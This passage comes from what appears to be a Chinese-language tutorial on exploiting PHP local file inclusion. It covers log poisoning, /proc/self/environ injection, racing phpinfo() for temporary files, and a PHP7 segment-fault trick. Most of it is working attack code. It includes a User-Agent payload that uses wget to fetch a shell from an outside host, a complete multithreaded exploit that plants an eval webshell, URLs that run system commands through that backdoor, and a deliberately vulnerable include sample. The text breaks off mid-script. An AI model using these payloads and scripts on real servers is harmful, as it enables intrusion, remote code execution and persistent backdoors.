<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/include/file.php?file=../../apache/logs/access.log</span><br></pre></td></tr></table></figure>

<p><strong>步骤：</strong></p>
<ul>
<li>查看日志，确定日志文件</li>
<li>利用burp上传木马，上传点有多处，user-agent</li>
<li>蚁剑连接日志文件，查看</li>
</ul>
<h2 id="0x06-包含-pros-self-environ"><a href="#0x06-包含-pros-self-environ" class="headerlink" title="0x06 包含/pros/self/environ"></a>0x06 包含/pros/self/environ</h2><p>该文件储存着当前进程的环境变量列表</p>
<p>proc/self/environ中会保存user-agent头，如果在user-agent中插入php代码，则php代码会被写入到environ中，之后再包含它，即可。</p>
<p>利用条件：</p>
<p>php以cgi方式运行，这样environ才会保持UA头。</p>
<p>environ文件存储位置已知，且environ文件可读。</p>
<p><strong>利用方式：</strong></p>
<ul>
<li><p>检查proc/self/environ是否可用访问</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">提交url:www.website.com/view.php?page=../../../../../proc/self/environ</span><br></pre></td></tr></table></figure>

<p>说明是可以访问的,如果返回时个空白页,说明是无法访问的,也可能操作系统是FreeBSD</p>
</li>
<li><p>注入恶意代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">选择User-Agent 写代码如下： </span><br><span class="line">   </span><br><span class="line">  &lt;?systm(&#x27;wget http://hack-bay.com/Shells/gny.txt -O shell.php&#x27;);?&gt;</span><br></pre></td></tr></table></figure></li>
<li><p>访问我们的shell</p>
<p><a target="_blank" rel="noopener" href="http://www.website.com/shell.php">www.website.com/shell.php</a></p>
</li>
</ul>
<h2 id="0x07-包含临时文件"><a href="#0x07-包含临时文件" class="headerlink" title="0x07 包含临时文件"></a>0x07 包含临时文件</h2><p>只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。假如在服务器上找不到我们可以包含的文件，可以通过利用一些技巧让服务存储我们恶意生成的临时文件，该临时文件包含我们构造的的恶意代码，此时服务器就存在我们可以包含的文件。当我们在给PHP发送POST数据包时，如果数据包里包含文件区块，无论你访问的代码中有没有处理文件上传的逻辑，PHP都会将这个文件保存成一个临时文件。文件名可以在<code>$_FILES</code>变量中找到。这个临时文件，在请求结束后就会被删除。phpinfo页面会将当前请求上下文中所有变量都打印出来，所以我们如果向phpinfo页面发送包含文件区块的数据包，则即可在返回包里找到<code>$_FILES</code>变量的内容，拿到临时文件变量名之后，就可以进行包含执行我们传入的恶意代码。</p>
<p>目前，常见的两种临时文件包含漏洞利用方法主要是：<code>PHPINFO()</code> and <code>PHP7 Segment Fault</code>。</p>
<p>利用到条件竞争（Race Condition），原理也好理解——我们用两个以上的线程来利用，其中一个发送上传包给phpinfo页面，并读取返回结果，找到临时文件名；第二个线程拿到这个文件名后马上进行包含利用。</p>
<p><strong>临时文件</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">全局变量</span><br><span class="line">在PHP中可以使用POST方法或者PUT方法进行文本和二进制文件的上传。上传的文件信息会保存在全局变量$_FILES里。</span><br><span class="line"></span><br><span class="line">$_FILES超级全局变量很特殊，他是预定义超级全局数组中唯一的二维数组。其作用是存储各种与上传文件有关的信息，这些信息对于通过PHP脚本上传到服务器的文件至关重要。</span><br><span class="line"></span><br><span class="line">$_FILES[&#x27;userfile&#x27;][&#x27;name&#x27;] 客户端文件的原名称。</span><br><span class="line">$_FILES[&#x27;userfile&#x27;][&#x27;type&#x27;] 文件的 MIME 类型，如果浏览器提供该信息的支持，例如&quot;image/gif&quot;。</span><br><span class="line">$_FILES[&#x27;userfile&#x27;][&#x27;size&#x27;] 已上传文件的大小，单位为字节。</span><br><span class="line">$_FILES[&#x27;userfile&#x27;][&#x27;tmp_name&#x27;] 文件被上传后在服务端储存的临时文件名，一般是系统默认。可以在php.ini的upload_tmp_dir 指定，默认是/tmp目录。</span><br><span class="line">$_FILES[&#x27;userfile&#x27;][&#x27;error&#x27;] 该文件上传的错误代码，上传成功其值为0，否则为错误信息。</span><br><span class="line">在临时文件包含漏洞中$_FILES[&#x27;userfile&#x27;][&#x27;name&#x27;]这个变量值的获取很重要，因为临时文件的名字都是由随机函数生成的，只有知道文件的名字才能正确的去包含它。</span><br><span class="line"></span><br><span class="line">存储目录</span><br><span class="line">文件被上传后，默认会被存储到服务端的默认临时目录中，该临时目录由php.ini的upload_tmp_dir属性指定，假如upload_tmp_dir的路径不可写，PHP会上传到系统默认的临时目录中。</span><br></pre></td></tr></table></figure>

<p><strong>Linux目录</strong>   /tmp/   格式通常是（<code>/tmp/php[6个随机字符]</code>）</p>
<p><strong>Windows目录</strong>  C:/Windows/    C:/Windows/Temp/   格式通常是（<code>C:/Windows/php[4个随机字符].tmp</code>）</p>
<p><strong>漏洞利用</strong></p>
<p>​         <strong>测试脚本</strong></p>
<p>编写脚本，上传文件探测是否存在phpinfo包含临时文件的信息。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">files = &#123;</span><br><span class="line">  <span class="string">&#x27;file&#x27;</span>: (<span class="string">&quot;aa.txt&quot;</span>,<span class="string">&quot;ssss&quot;</span>)</span><br><span class="line">&#125;</span><br><span class="line">url = <span class="string">&quot;http://x.x.x.x/phpinfo.php&quot;</span></span><br><span class="line">r = requests.post(url=url, files=files, allow_redirects=<span class="literal">False</span>)</span><br><span class="line"><span class="built_in">print</span>(r.text)</span><br></pre></td></tr></table></figure>

<p>若回显中包含临时文件名，则可以利用phpinfo的特性</p>
<p>​         <strong>利用原理</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">验证了phpinfo的特性确实存在，所以在文件包含漏洞找不到可利用的文件时，我们就可以利用这一特性，找到并提取临时文件名，然后包含之即可Getshell。</span><br><span class="line"></span><br><span class="line">但文件包含漏洞和phpinfo页面通常是两个页面，理论上我们需要先发送数据包给phpinfo页面，然后从返回页面中匹配出临时文件名，再将这个文件名发送给文件包含漏洞页面，进行getshell。在第一个请求结束时，临时文件就被删除了，第二个请求自然也就无法进行包含。</span><br></pre></td></tr></table></figure>

<p>​        <strong>利用过程</strong></p>
<p>这个时候就需要用到条件竞争，具体原理和过程如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">（1）发送包含了webshell的上传数据包给phpinfo页面，这个数据包的header、get等位置需要塞满垃圾数据</span><br><span class="line"></span><br><span class="line">（2）因为phpinfo页面会将所有数据都打印出来，1中的垃圾数据会将整个phpinfo页面撑得非常大</span><br><span class="line"></span><br><span class="line">（3）php默认的输出缓冲区大小为4096，可以理解为php每次返回4096个字节给socket连接</span><br><span class="line"></span><br><span class="line">（4）所以，我们直接操作原生socket，每次读取4096个字节。只要读取到的字符里包含临时文件名，就立即发送第二个数据包</span><br><span class="line"></span><br><span class="line">（5）此时，第一个数据包的socket连接实际上还没结束，因为php还在继续每次输出4096个字节，所以临时文件此时还没有删除</span><br><span class="line"></span><br><span class="line">（6）利用这个时间差，第二个数据包，也就是文件包含漏洞的利用，即可成功包含临时文件，最终getshell</span><br><span class="line"></span><br><span class="line">（参考ph牛：https://github.com/vulhub/vulhub/tree/master/php/inclusion ）</span><br></pre></td></tr></table></figure>

<p><strong>Getshell</strong></p>
<p>exp.py（在Docker PHP 7.4下用150线程多次尝试）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python</span></span><br><span class="line"><span class="comment">#python version 2.7</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">setup</span>(<span class="params">host, port</span>):</span></span><br><span class="line">    TAG = <span class="string">&quot;Security Test&quot;</span></span><br><span class="line">    PAYLOAD = <span class="string">&quot;&quot;&quot;%sr</span></span><br><span class="line"><span class="string">&lt;?php file_put_contents(&#x27;/tmp/Qftm&#x27;, &#x27;&lt;?php eval($_REQUEST[Qftm])?&gt;&#x27;)?&gt;r&quot;&quot;&quot;</span> % TAG</span><br><span class="line">    <span class="comment"># PAYLOAD = &quot;&quot;&quot;%sr</span></span><br><span class="line">    <span class="comment"># &lt;?php file_put_contents(&#x27;/var/www/html/Qftm.php&#x27;, &#x27;&lt;?php eval($_REQUEST[Qftm])?&gt;&#x27;)?&gt;r&quot;&quot;&quot; % TAG</span></span><br><span class="line">    REQ1_DATA = <span class="string">&quot;&quot;&quot;-----------------------------7dbff1ded0714r</span></span><br><span class="line"><span class="string">Content-Disposition: form-data; name=&quot;dummyname&quot;; filename=&quot;test.txt&quot;r</span></span><br><span class="line"><span class="string">Content-Type: text/plainr</span></span><br><span class="line"><span class="string">r</span></span><br><span class="line"><span class="string">%s</span></span><br><span class="line"><span class="string">-----------------------------7dbff1ded0714--r&quot;&quot;&quot;</span> % PAYLOAD</span><br><span class="line">    padding = <span class="string">&quot;A&quot;</span> * <span class="number">5000</span></span><br><span class="line">    REQ1 = <span class="string">&quot;&quot;&quot;POST /phpinfo.php?a=&quot;&quot;&quot;</span> + padding + <span class="string">&quot;&quot;&quot; HTTP/1.1r</span></span><br><span class="line"><span class="string">Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie=&quot;&quot;&quot;</span> + padding + <span class="string">&quot;&quot;&quot;r</span></span><br><span class="line"><span class="string">HTTP_ACCEPT: &quot;&quot;&quot;</span> + padding + <span class="string">&quot;&quot;&quot;r</span></span><br><span class="line"><span class="string">HTTP_USER_AGENT: &quot;&quot;&quot;</span> + padding + <span class="string">&quot;&quot;&quot;r</span></span><br><span class="line"><span class="string">HTTP_ACCEPT_LANGUAGE: &quot;&quot;&quot;</span> + padding + <span class="string">&quot;&quot;&quot;r</span></span><br><span class="line"><span class="string">HTTP_PRAGMA: &quot;&quot;&quot;</span> + padding + <span class="string">&quot;&quot;&quot;r</span></span><br><span class="line"><span class="string">Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714r</span></span><br><span class="line"><span class="string">Content-Length: %sr</span></span><br><span class="line"><span class="string">Host: %sr</span></span><br><span class="line"><span class="string">r</span></span><br><span class="line"><span class="string">%s&quot;&quot;&quot;</span> % (<span class="built_in">len</span>(REQ1_DATA), host, REQ1_DATA)</span><br><span class="line">    <span class="comment"># modify this to suit the LFI script</span></span><br><span class="line">    LFIREQ = <span class="string">&quot;&quot;&quot;GET /index.php?file=%s HTTP/1.1r</span></span><br><span class="line"><span class="string">User-Agent: Mozilla/4.0r</span></span><br><span class="line"><span class="string">Proxy-Connection: Keep-Aliver</span></span><br><span class="line"><span class="string">Host: %sr</span></span><br><span class="line"><span class="string">r</span></span><br><span class="line"><span class="string">r</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">return</span> (REQ1, TAG, LFIREQ)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">phpInfoLFI</span>(<span class="params">host, port, phpinforeq, offset, lfireq, tag</span>):</span></span><br><span class="line">    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line"></span><br><span class="line">    s.connect((host, port))</span><br><span class="line">    s2.connect((host, port))</span><br><span class="line"></span><br><span class="line">    s.send(phpinforeq)</span><br><span class="line">    d = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">while</span> <span class="built_in">len</span>(d) &lt; offset:</span><br><span class="line">        d += s.recv(offset)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        i = d.index(<span class="string">&quot;[tmp_name] =&amp;gt; &quot;</span>)</span><br><span class="line">        fn = d[i + <span class="number">17</span>:i + <span class="number">31</span>]</span><br><span class="line">    <span class="keyword">except</span> ValueError:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">    s2.send(lfireq % (fn, host))</span><br><span class="line">    d = s2.recv(<span class="number">4096</span>)</span><br><span class="line">    s.close()</span><br><span class="line">    s2.close()</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> d.find(tag) != -<span class="number">1</span>:</span><br><span class="line">        <span class="keyword">return</span> fn</span><br><span class="line"></span><br><span class="line">counter = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">ThreadWorker</span>(<span class="params">threading.Thread</span>):</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span>(<span class="params">self, e, l, m, *args</span>):</span></span><br><span class="line">        threading.Thread.__init__(self)</span><br><span class="line">        self.event = e</span><br><span class="line">        self.lock = l</span><br><span class="line">        self.maxattempts = m</span><br><span class="line">        self.args = args</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">run</span>(<span class="params">self</span>):</span></span><br><span class="line">        <span class="keyword">global</span> counter</span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">not</span> self.event.is_set():</span><br><span class="line">            <span class="keyword">with</span> self.lock:</span><br><span class="line">                <span class="keyword">if</span> counter &gt;= self.maxattempts:</span><br><span class="line">                    <span class="keyword">return</span></span><br><span class="line">                counter += <span class="number">1</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                x = phpInfoLFI(*self.args)</span><br><span class="line">                <span class="keyword">if</span> self.event.is_set():</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">                <span class="keyword">if</span> x:</span><br><span class="line">                    <span class="built_in">print</span> <span class="string">&quot;nGot it! Shell created in /tmp/Qftm.php&quot;</span></span><br><span class="line">                    self.event.<span class="built_in">set</span>()</span><br><span class="line"></span><br><span class="line">            <span class="keyword">except</span> socket.error:</span><br><span class="line">                <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getOffset</span>(<span class="params">host, port, phpinforeq</span>):</span></span><br><span class="line">    <span class="string">&quot;&quot;&quot;Gets offset of tmp_name in the php output&quot;&quot;&quot;</span></span><br><span class="line">    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">    s.connect((host, port))</span><br><span class="line">    s.send(phpinforeq)</span><br><span class="line"></span><br><span class="line">    d = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        i = s.recv(<span class="number">4096</span>)</span><br><span class="line">        d += i</span><br><span class="line">        <span class="keyword">if</span> i == <span class="string">&quot;&quot;</span>:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="comment"># detect the final chunk</span></span><br><span class="line">        <span class="keyword">if</span> i.endswith(<span class="string">&quot;0rnrn&quot;</span>):</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    s.close()</span><br><span class="line">    i = d.find(<span class="string">&quot;[tmp_name] =&amp;gt; &quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> i == -<span class="number">1</span>:</span><br><span class="line">        <span class="keyword">raise</span> ValueError(<span class="string">&quot;No php tmp_name in phpinfo output&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span> <span class="string">&quot;found %s at %i&quot;</span> % (d[i:i + <span class="number">10</span>], i)</span><br><span class="line">    <span class="comment"># padded up a bit</span></span><br><span class="line">    <span class="keyword">return</span> i + <span class="number">256</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">main</span>():</span></span><br><span class="line">    <span class="built_in">print</span> <span class="string">&quot;LFI With PHPInfo()&quot;</span></span><br><span class="line">    <span class="built_in">print</span> <span class="string">&quot;-=&quot;</span> * <span class="number">30</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(sys.argv) &lt; <span class="number">2</span>:</span><br><span class="line">        <span class="built_in">print</span> <span class="string">&quot;Usage: %s host [port] [threads]&quot;</span> % sys.argv[<span class="number">0</span>]</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        host = socket.gethostbyname(sys.argv[<span class="number">1</span>])</span><br><span class="line">    <span class="keyword">except</span> socket.error, e:</span><br><span class="line">        <span class="built_in">print</span> <span class="string">&quot;Error with hostname %s: %s&quot;</span> % (sys.argv[<span class="number">1</span>], e)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    port = <span class="number">80</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        port = <span class="built_in">int</span>(sys.argv[<span class="number">2</span>])</span><br><span class="line">    <span class="keyword">except</span> IndexError:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">    <span class="keyword">except</span> ValueError, e:</span><br><span class="line">        <span class="built_in">print</span> <span class="string">&quot;Error with port %d: %s&quot;</span> % (sys.argv[<span class="number">2</span>], e)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    poolsz = <span class="number">10</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        poolsz = <span class="built_in">int</span>(sys.argv[<span class="number">3</span>])</span><br><span class="line">    <span class="keyword">except</span> IndexError:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">    <span class="keyword">except</span> ValueError, e:</span><br><span class="line">        <span class="built_in">print</span> <span class="string">&quot;Error with poolsz %d: %s&quot;</span> % (sys.argv[<span class="number">3</span>], e)</span><br><span class="line">        sys.exit(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span> <span class="string">&quot;Getting initial offset...&quot;</span>,</span><br><span class="line">    reqphp, tag, reqlfi = setup(host, port)</span><br><span class="line">    offset = getOffset(host, port, reqphp)</span><br><span class="line">    sys.stdout.flush()</span><br><span class="line"></span><br><span class="line">    maxattempts = <span class="number">1000</span></span><br><span class="line">    e = threading.Event()</span><br><span class="line">    l = threading.Lock()</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span> <span class="string">&quot;Spawning worker pool (%d)...&quot;</span> % poolsz</span><br><span class="line">    sys.stdout.flush()</span><br><span class="line"></span><br><span class="line">    tp = []</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, poolsz):</span><br><span class="line">        tp.append(ThreadWorker(e, l, maxattempts, host, port, reqphp, offset, reqlfi, tag))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> t <span class="keyword">in</span> tp:</span><br><span class="line">        t.start()</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">while</span> <span class="keyword">not</span> e.wait(<span class="number">1</span>):</span><br><span class="line">            <span class="keyword">if</span> e.is_set():</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">with</span> l:</span><br><span class="line">                sys.stdout.write(<span class="string">&quot;r% 4d / % 4d&quot;</span> % (counter, maxattempts))</span><br><span class="line">                sys.stdout.flush()</span><br><span class="line">                <span class="keyword">if</span> counter &gt;= maxattempts:</span><br><span class="line">                    <span class="keyword">break</span></span><br><span class="line">        <span class="built_in">print</span></span><br><span class="line">        <span class="keyword">if</span> e.is_set():</span><br><span class="line">            <span class="built_in">print</span> <span class="string">&quot;Woot!  m/&quot;</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="built_in">print</span> <span class="string">&quot;:(&quot;</span></span><br><span class="line">    <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line">        <span class="built_in">print</span> <span class="string">&quot;nTelling threads to shutdown...&quot;</span></span><br><span class="line">        e.<span class="built_in">set</span>()</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span> <span class="string">&quot;Shuttin&#x27; down...&quot;</span></span><br><span class="line">    <span class="keyword">for</span> t <span class="keyword">in</span> tp:</span><br><span class="line">        t.join()</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure>

<p>拿到RCE之后，可以查看tmp下生成的后门文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.33.6.145/index.php?file=/tmp/Qftm&amp;Qftm=system(%27ls%20/tmp/%27)</span><br></pre></td></tr></table></figure>

<p>然后使用后门管理工具连接后门webshell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://  /index.php?file=/tmp/Qftm</span><br><span class="line">Qftm</span><br></pre></td></tr></table></figure>



<p><strong>php7 Segment Fault</strong></p>
<p>利用条件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">7.0.0 &lt;= PHP Version &lt; 7.0.28</span><br></pre></td></tr></table></figure>

<p>那么如果目标不存在phpinfo,可以用<code>php7 segment fault</code>特性（<a target="_blank" rel="noopener" href="https://bugs.php.net/bug.php?id=75535">CVE-2018-14884</a>）进行Bypass。</p>
<p>php代码中使用php://filter的过滤器<code>strip_tags</code> , 可以让 php 执行的时候直接出现 Segment Fault , 这样 php 的垃圾回收机制就不会在继续执行 , 导致 POST 的文件会保存在系统的缓存目录下不会被清除而不想phpinfo那样上传的文件很快就会被删除，</p>
<p><strong>代码环境</strong></p>
<p>index.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $a = @$_GET[&#x27;file&#x27;];</span><br><span class="line">    include $a;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>dir.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $a = @$_GET[&#x27;dir&#x27;];</span><br><span class="line">    var_dump(scandir($a));</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><strong>PHP</strong> <strong>Version</strong> 7.0.9</p>
<p><strong>攻击载荷</strong></p>
<p>string.strip_tags过滤器导致出现php segment fault</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=php://filter/string.strip_tags/resource=index.php</span><br></pre></td></tr></table></figure>

<p>此时上传文件，临时文件会被保存在<code>upload_tmp_dir</code>所指定的目录下，从而不会被删除，一直存储在服务的临时目录里面。</p>
<h3 id="攻击利用-技巧1"><a href="#攻击利用-技巧1" class="headerlink" title="攻击利用-技巧1"></a><strong>攻击利用-技巧1</strong></h3><p>我们可以通过<code>dir.php</code>辅助查找生成的临时文件</p>
<p><strong>编写 Linux Exp</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">#python version 2.7</span><br><span class="line"></span><br><span class="line">import requests</span><br><span class="line">from io import BytesIO</span><br><span class="line">import re</span><br><span class="line"></span><br><span class="line">files = &#123;</span><br><span class="line">  &#x27;file&#x27;: BytesIO(&#x27;&lt;?php eval($_REQUEST[Qftm]);&#x27;)</span><br><span class="line">&#125;</span><br><span class="line">url1 = &#x27;http://192.168.68.119/index.php?file=php://filter/string.strip_tags/resource=index.php&#x27;</span><br><span class="line">r = requests.post(url=url1, files=files, allow_redirects=False)</span><br><span class="line"></span><br><span class="line">url2 = 